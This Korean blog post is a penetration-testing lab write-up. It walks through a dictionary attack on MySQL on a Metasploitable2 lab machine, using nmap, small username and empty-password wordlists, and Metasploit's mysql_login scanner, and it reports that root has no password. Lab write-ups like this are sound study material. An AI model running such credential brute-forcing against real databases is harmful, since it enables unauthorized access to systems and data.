일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 |
- livedata
- DART
- data
- 계측
- activity
- ScrollView
- 테스트
- tabbar
- Dialog
- textview
- TEST
- LifeCycle
- 앱바
- Compose
- binding
- Button
- intent
- appbar
- Kotlin
- drift
- viewmodel
- scroll
- Navigation
- CustomScrollView
- Flutter
- Coroutines
- textfield
- android
- 앱
- 안드로이드
- Today
- Total
Study Record
[모의해킹 실습] 사전파일을 이용한 MySql 원격 로그인 시도 본문
1. 개요
Msfconsole 사전파일을 이용하여 (Dictionary Attack) MySql에 원격 로그인 시도를 해본다. (port : 3306)
2. 실습
→ msfconsole의 auxiliary/scanner/mysql/mysql_login 이용한다.
공격자(KaliLinux) : 192.168.10.50
공격 대상(MetasploitableV2 Linux) : 192.168.10.134
[KaliLinux]
㉮ 공격대상 시스템 스캔한다.
# nmap -sV -p 3632 192.168.10.134 -p 3306
㉯ 사전 파일을 만든다.
# cd /usr/share/metasploit-framework/data/wordlists
# vi user.txt
root
admin
administrator
# echo "" > pass.txt # root 사용자의 암호가 없는 경우도 있다.
→ /usr/share/metasploit-framework/data/wordlists/user.txt 파일과 /usr/share/metasploit-framework/data/wordlists/pass.txt 파일로 사전파일을 만들었다.
㉰ msfconsole 의 auxiliary/scanner/mysql/mysql_login 을 이용하여 공격을 시도한다.
# msfconsole -q
msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 > set RHOSTS 192.168.10.134
msf6 > set USER_FILE /usr/share/metasploit-framework/data/wordlists/user.txt
msf6 > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/pass.txt
msf6 > set STOP_ON_SUCCESS true
msf6 > run
사전 파일 공격 결과 ID 는 root 이고 passwd 는 없다는 것으로 나왔다.
㉱ 직접 root/" " 로 MySql 접속을 시도해본다.
'모의해킹' 카테고리의 다른 글
[모의해킹 실습] msfvenom CMD 로 백도어 만들기 - 악성코드 (0) | 2021.11.15 |
---|---|
[모의해킹 실습] exploit-db.com을 이용한 tikiwiki 취약점 공격 (0) | 2021.11.15 |
[모의해킹 시스템 취약점] DistCCd 취약점 (0) | 2021.11.13 |
[모의해킹 시스템 취약점] Ingress lock 백도어 / UnreadlRCd 백도어 취약점 (0) | 2021.11.13 |
[모의해킹 시스템 취약점] JAVA RMI (CVE-2011-3556) (0) | 2021.11.13 |